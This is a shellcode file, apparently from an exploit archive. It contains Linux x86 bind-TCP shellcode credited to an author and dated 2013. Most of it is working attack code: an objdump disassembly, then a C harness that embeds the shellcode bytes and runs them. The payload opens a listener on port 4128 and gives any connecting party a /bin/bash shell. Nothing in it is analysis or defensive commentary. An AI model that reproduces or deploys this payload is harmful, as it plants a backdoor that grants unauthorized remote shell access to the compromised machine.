; Filename  : bind_tcp_shell.asm
; Author    : M.Acosta <amcx62[_at_]gmail[_dot_]com>
; Date      : 2013 August
; Location  : Lima(Peru)
; Desc      : Bind Tcp Shellcode
; Tested on : Linux/x86 (Ubuntu SMP 3.2.0-49-generic-pae)

$ objdump -D bind_tcp_shell -M intel

bind_tcp_shell:     file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
 8048060:  31 c0                	xor    eax,eax
 8048062:	b0 66                	mov    al,0x66
 8048064:	31 db                	xor    ebx,ebx
 8048066:	b3 01                	mov    bl,0x1
 8048068:	31 c9                	xor    ecx,ecx
 804806a:	6a 06                	push   0x6
 804806c:	6a 01                	push   0x1
 804806e:	6a 02                	push   0x2
 8048070:	89 e1                	mov    ecx,esp
 8048072:	cd 80                	int    0x80
 8048074:	89 c6                	mov    esi,eax
 8048076:	31 c0                	xor    eax,eax
 8048078:	b0 66                	mov    al,0x66
 804807a:	31 db                	xor    ebx,ebx
 804807c:	b3 02                	mov    bl,0x2
 804807e:	31 d2                	xor    edx,edx
 8048080:	52                   	push   edx
 8048081:	66 68 20 10          	pushw  0x1020
 8048085:	66 6a 02             	pushw  0x2
 8048088:	89 e1                	mov    ecx,esp
 804808a:	6a 10                	push   0x10
 804808c:	51                   	push   ecx
 804808d:	56                   	push   esi
 804808e:	89 e1                	mov    ecx,esp
 8048090:	cd 80                	int    0x80
 8048092:	31 c0                	xor    eax,eax
 8048094:	b0 66                	mov    al,0x66
 8048096:	31 db                	xor    ebx,ebx
 8048098:	b3 04                	mov    bl,0x4
 804809a:	6a 01                	push   0x1
 804809c:	56                   	push   esi
 804809d:	89 e1                	mov    ecx,esp
 804809f:	cd 80                	int    0x80
 80480a1:	31 c0                	xor    eax,eax
 80480a3:	b0 66                	mov    al,0x66
 80480a5:	31 db                	xor    ebx,ebx
 80480a7:	b3 05                	mov    bl,0x5
 80480a9:	31 d2                	xor    edx,edx
 80480ab:	52                   	push   edx
 80480ac:	52                   	push   edx
 80480ad:	56                   	push   esi
 80480ae:	89 e1                	mov    ecx,esp
 80480b0:	cd 80                	int    0x80
 80480b2:	31 c0                	xor    eax,eax
 80480b4:	31 c9                	xor    ecx,ecx
 80480b6:	b1 02                	mov    cl,0x2

080480b8 <dup2>:
 80480b8:	b0 3f                	mov    al,0x3f
 80480ba:	cd 80                	int    0x80
 80480bc:	fe c9                	dec    cl
 80480be:	79 f8                	jns    80480b8 <dup2>
 80480c0:	31 c0                	xor    eax,eax
 80480c2:	50                   	push   eax
 80480c3:	68 62 61 73 68       	push   0x68736162
 80480c8:	68 62 69 6e 2f       	push   0x2f6e6962
 80480cd:	68 2f 2f 2f 2f       	push   0x2f2f2f2f
 80480d2:	89 e3                	mov    ebx,esp
 80480d4:	50                   	push   eax
 80480d5:	89 e2                	mov    edx,esp
 80480d7:	53                   	push   ebx
 80480d8:	89 e1                	mov    ecx,esp
 80480da:	b0 0b                	mov    al,0xb
 80480dc:	cd 80                	int    0x80


#include<stdio.h>
#include<string.h>

#define PORT "\x20\x10"


unsigned char code[] = \
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\x68"PORT"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x31\xc0\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
